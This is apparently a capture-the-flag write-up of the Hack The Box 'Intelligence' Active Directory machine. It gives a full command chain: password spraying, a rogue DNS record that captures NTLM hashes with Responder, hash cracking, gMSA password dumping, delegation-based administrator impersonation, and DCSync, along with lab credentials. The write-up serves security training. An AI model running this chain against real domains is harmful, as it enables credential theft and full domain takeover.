# Intelligence ### Autorecon **Password:** PentestEverything {% file src="" %} ### BloodHound {% file src="" %} ## Nmap ``` nmap 10.10.10.248 -p- -sS -sV PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-16 03:37:19Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49692/tcp open msrpc Microsoft Windows RPC 49702/tcp open msrpc Microsoft Windows RPC 49714/tcp open msrpc Microsoft Windows RPC 59877/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows ``` {% hint style="info" %} Add "10.10.10.248 intelligence.htb" to /etc/hosts. {% endhint %} Starting out on port 80 we come to the root page for Intelligence. ![http://10.10.10.248/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5a2a9bfedcc09bc5b18108ccdba5460ebc3e5ef6%2Fimage.png?alt=media) Running `feroxbuster` against the host revelas few results. ```bash feroxbuster -u http://10.10.10.248 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-060b7f9509db8b90d8db9cd2d055ea9778147de3%2Fimage.png?alt=media) We see that further down the main page we have an opportunity to download a PDF document. At a glance there is nothing special about the document. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-89edfc3c63372c4e5447696030730a53627b832d%2Fimage.png?alt=media) However, pulling metadata from the PDF document reveals potentially interesting user information. We can achieve this withe `exiftool`. ``` exiftool 2020-01-01-upload.pdf ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bf66a1e4bce9bf4456c7f4e20361645a08135944%2Fimage.png?alt=media) We can then put the username into a known user text file and checking if the name is valid with kerbrute. ``` kerbrute userenum users.txt -d intelligence.htb --dc 10.10.10.248 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9bb386ee59567f7847e02b4788eede4024ca9613%2Fimage.png?alt=media) Great, we have a valid username. However, I was unable to brute force this user account. We also know the the account does not have pre-authentication enabled... Looking back at the original request for the PDF document we notice we are unable list the contents or browse to the `/documents` directory on port 80. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5471ff80f6a0d180fdba2af17a86e0041ab355e8%2Fimage.png?alt=media) The URL request for the document download has potentially fuzzable areas in the file name. We can try fuzzing for other PDF documents in the date range of the file name. ``` http://10.10.10.248/documents/2020-01-01-upload.pdf ``` Firstly, I started `OWASP ZAP` and requested the PDF document again. From here I selected the request and sent it to the fuzzer. To ensure complete coverage I selected each individual numeral from the date and added individual payloads for numbers 0-9 using the Numberzz module. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f760e502474a63f2dce999c7c6e0ec5fc4b7b11%2Fimage.png?alt=media) Then executed the fuzzer, in total we send 10000 requests to the target. Once completed sorting the results by size shows which requests have PDF documents available. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fd2d8018ecffe9abb1c35b0a6272fd715bdafd0c%2Fimage.png?alt=media) Highlighting all the request with a response body larger than 1,245 bytes should represent everything of interest. Once we highlight all the request of interest we can right click to open the contextual menu and "Copy URLs to clipboard" and paste the results into a text file. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4f5c896bc6db1516e508de0f6c4cff399b2f7eb6%2Fimage.png?alt=media) With a list of URLs we can run `xargs` with `curl` to download from each URL. ``` xargs -n 1 curl -O < "URLs.txt" ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-335d80d899e882b4ce53b5dcdbe691b2a4772314%2Fimage.png?alt=media) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bc1a379480c9b127b02765de88c56b362f1fe734%2Fimage.png?alt=media) We can then run `exiftool` against all PDF's and extract the creator names into a known users file. ``` exiftool -r *.pdf | grep Creator | sed 's/Creator : //' | sort | uniq > KnownUsers.txt ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5e5ff32bbf40099c6a1fca315cbb72b6497d83dc%2Fimage.png?alt=media) ``` Anita.Roberts Brian.Baker Brian.Morris Daniel.Shelton Danny.Matthews Darryl.Harris David.Mcbride David.Reed David.Wilson Ian.Duncan Jason.Patterson Jason.Wright Jennifer.Thomas Jessica.Moody John.Coleman Jose.Williams Kaitlyn.Zimmerman Kelly.Long Nicole.Brock Richard.Williams Samuel.Richardson Scott.Scott Stephanie.Young Teresa.Williamson Thomas.Hall Thomas.Valenzuela Tiffany.Molina Travis.Evans Veronica.Patel William.Lee ``` Checking against `kerbrute` for pre-authentication we do not get any positive hits. We do at least confirm the existence of users so far. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4f1639329f5ccd93390e0efc7f921beaf487d472%2Fimage.png?alt=media) From here I tried brute forcing the username list for quite some time, utilizing various common password lists and could not get a single hit over any of the available protocols. Digging deeper into our results I looked into parsing all the PDF documents for interesting information. I researched the best way to parse PDF documents recursively for information and came across `pdfgrep`. **Install** ``` sudo apt install pdfgrep ``` Using the following command and specified pattern we identify something of interest. ``` pdfgrep pass -r . ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-234b0d7aff3ef4e56910e8d59473b876f74ab2fa%2Fimage.png?alt=media) Opening the file 2020-06-04-upload.pdf show us a potential password. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f41250feb2a8463794652bda9a4dd1ba48b448c3%2Fimage.png?alt=media) **Password** ``` NewIntelligenceCorpUser9876 ``` We can spray this password with `crackmapexec` against SMB with our user list. ```bash crackmapexec smb '10.10.10.248' -u 'users.txt' -p 'NewIntelligenceCorpUser9876' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8362fb89e0bcd3261b85b307b0ab618c3d52abaf%2Fimage.png?alt=media) Where we the following valid credentials: ``` Tiffany.Molina:NewIntelligenceCorpUser9876 ``` I was unable to utilize the user credentials to gain shell on the target system. We can however, use Bloodhound.py for external information gathering. **Github:** ``` sudo python2 bloodhound.py -u 'tiffany.molina' -p 'NewIntelligenceCorpUser9876' -c All -d intelligence.htb -gc dc.intelligence.htb -ns 10.10.10.248 --dns-timeout 20 --zip ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3d9b9dbfa3d53f8301edb92c3fc6237c2e0d0537%2Fimage.png?alt=media) Looking at the `Bloodhound` results we have found a path for performing privilege escalation. First we need to try and get access to either Ted's or Laura's AD accounts. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dedefa361c220d7113474cca806f516ca3a16988%2Fimage.png?alt=media) Back to our *tiffany* user we look at SMB. We see we have read access to the IT Share. ``` smbmap -u 'tiffany.molina' -p 'NewIntelligenceCorpUser9876' -H 10.10.10.248 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fa478bddfb9392e272251a5375127c3d7026a33d%2Fimage.png?alt=media) Inside the IT share we find a `PowerShell` script which can be downloaded. The contents of which has been shown below: ```powershell # Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves ' -To 'Ted Graves ' -Subject "Host: $($record.Name) is down" } } catch {} } ``` Looking at the script it looks like a list of `DNS` records is fetched from `LDAP` and any records with name like "web" are then used in an `Invoke-WebRequest` to test if alive. The parameter -- `-UseDefaultCredentials` runs the script in the context of the user. Hopefully this will be Ted going by the `Send-MailMessage` parameters. We can probably use `Responder` to try and catch a `NTLM` hash here. First we need a way for a new DNS record to point back to us. `dnstool.py` can be used to add a new DNS record into into the target domain. The command below adds a new DNS record starting with "web" to trigger the PowerShell script that runs every 5 minutes. **Github:** ``` sudo python3 dnstool.py -u intelligence.htb\\tiffany.molina -p 'NewIntelligenceCorpUser9876' -r Webfake.intelligence.htb -a add -d 10.10.14.14 10.10.10.248 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5959aea8042ca3d308e7b4aa51323abd4b480ec8%2Fimage.png?alt=media) We can confirm the DNS record has been added by using `ldapsearcher` with *tiffany's* credentials. ```bash ldapsearch -x -h 10.10.10.248 -D 'CN=Tiffany Molina,CN=Users,DC=intelligence,DC=htb' -w 'NewIntelligenceCorpUser9876' -b "DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | grep Web ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0013c3e9ce0882dfdea42d049550572acb9a02fc%2Fimage.png?alt=media) Then we can start `Responder` (with default responder.conf file). After around five minutes we should catch an NTLMv2 hash where the `PowerShell` script is triggered and points back to our attacking machine. ``` sudo python2 Responder.py -I tun0 -A ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-562e6bb80aa61722b3d253caa4e28bcf3e1fa18c%2Fimage.png?alt=media) **NTLMv2 hash** ``` Ted.Graves::intelligence:442c947175c3a3b7:137066EA5B18D803A78BEF442908364D:0101000000000000CC66ACA71E3AD80150504B3119CD58940000000002000800530034005100460001001E00570049004E002D004E004B003300480031004F0035004F004B00430056000400140053003400510046002E004C004F00430041004C0003003400570049004E002D004E004B003300480031004F0035004F004B00430056002E0053003400510046002E004C004F00430041004C000500140053003400510046002E004C004F00430041004C0008003000300000000000000000000000002000003D77F8C6CE9B70C505FB3580F608ED4749CDEC71C40CC8AB5EEBC6575A2F6FDD0A0010000000000000000000000000000000000009003A0048005400540050002F00770065006200660061006B0065002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 ``` We can then crack password with `hashcat` against the rockyou.txt password list. ``` hashcat -m 5600 hash.hash /usr/share/wordlists/rockyou.txt ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-be7facce7a5cba6a2a4192f4b7bff6208d062100%2Fimage.png?alt=media) We now have the following credentials ``` Ted.Graves:Mr.Teddy ``` Now that we have access to Ted's account we can refer back to the `Bloodhound` attack path identified earlier on. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5d9629a0f12fd31d9222047a11a399c122d1907d%2Fimage.png?alt=media) GMSA or Group Managed Serivce Accounts \*\*\*\* offer a more automated and secure way to manage service accounts. Stealthbits have a great blog post on what they are and how they are implimented linked below. * * gMSADUmper is a python script that can be utilized to read the msDS-ManagedPassword \*\*\*\* attribute and decrypt with the **msDS-ManagedPasswordID** attribute. **gMSADumper:** ```python python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -l 10.10.10.248 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-21519f032a537684947cb9e7453194c4fde1fe3d%2Fimage.png?alt=media) **Credentials** ``` svc_int:a5fd76c71109b0b483abe309fbc92ccb ``` From the BloodHound results earlier we see svc\_int has delegate access to the domain controller. Now with the *svc\_int* account hash we can then use Impacket's `getST.py` to retrieve a service ticket for the service we have delegate rights to "www" and impersonate another user "administrator". When performing this impersonating method we also get access to any services that are accessible to the impersponated account. Impersonating the administrator account gives us the ability to access services such as LDAP (DCsync Attack) or HOST (Psexec.py). ``` getST.py intelligence.htb/svc_int -hashes :a5fd76c71109b0b483abe309fbc92ccb -spn WWW/dc.intelligence.htb -impersonate Administrator ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b21f1421c7f9de529a12eb109f49c79c53126081%2Fimage.png?alt=media) Then run the following command to set the kerberos ticket use with Impacket. ``` export KRB5CCNAME=Administrator.ccache ``` Secretsdump.py can be used to then perform a DCsync attack and dump hashes. ``` secretsdump.py -k -no-pass dc.intelligence.htb ``` Psexec.py can also be used for direct system access as the administrator account. ``` psexec.py -k -no-pass dc.intelligence.htb ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7297c2ce3ac92a42f5662dbecf7ea6e71b40a183%2Fimage.png?alt=media)